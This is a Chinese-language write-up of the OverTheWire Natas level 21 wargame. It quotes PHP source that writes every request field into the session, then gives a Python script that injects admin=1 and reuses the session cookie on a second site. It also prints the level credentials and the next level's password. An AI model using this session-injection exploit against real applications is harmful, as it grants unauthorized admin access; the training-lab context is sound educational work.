Overthewire-natas21

Overthewire level 21 to level 22

进入页面我们看到说首页和另外一个页面关联，并且首页的代码也很简单，就只有一个打印函数，那么这题显然是让我们从它关联的页面获得第21关admin的cookie了。
进入21关后直接看源代码

<?
session_start();

// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
        $_SESSION[$key] = $val;
    }
}

if(array_key_exists("debug", $_GET)) {
    print "[DEBUG] Session contents:<br>";
    print_r($_SESSION);
}

// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";

$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
    $val = $defval;
    if(array_key_exists($key, $_SESSION)) {
        $val = $_SESSION[$key];
    } else {
        $_SESSION[$key] = $val;
    }
    $form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';

$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";
?>

代码相当简单，并且有漏洞的代码也丝毫不加掩饰。

if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
        $_SESSION[$key] = $val;
    }
}

直接把提交的表带内每一项设置到session里去，这里我们只需要加一个admin=1即可。破解代码如下

import requests

auth = ('natas21', 'IFekPyrQXftziDEsUr3x21sYuahypdgJ')

resp = requests.post('http://natas21-experimenter.natas.labs.overthewire.org/index.php',
                     auth=auth,
                     data={
                         'align': 'center',
                         'fontsize': '100%',
                         'bgcolor': 'yellow',
                         'submit': 'Update',
                         'admin': '1'
                     })
sid = resp.cookies['PHPSESSID']
resp = requests.get('http://natas21.natas.labs.overthewire.org/',
                    auth=auth,
                    cookies={'PHPSESSID': sid})
print(resp.text)

第22关密码为chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ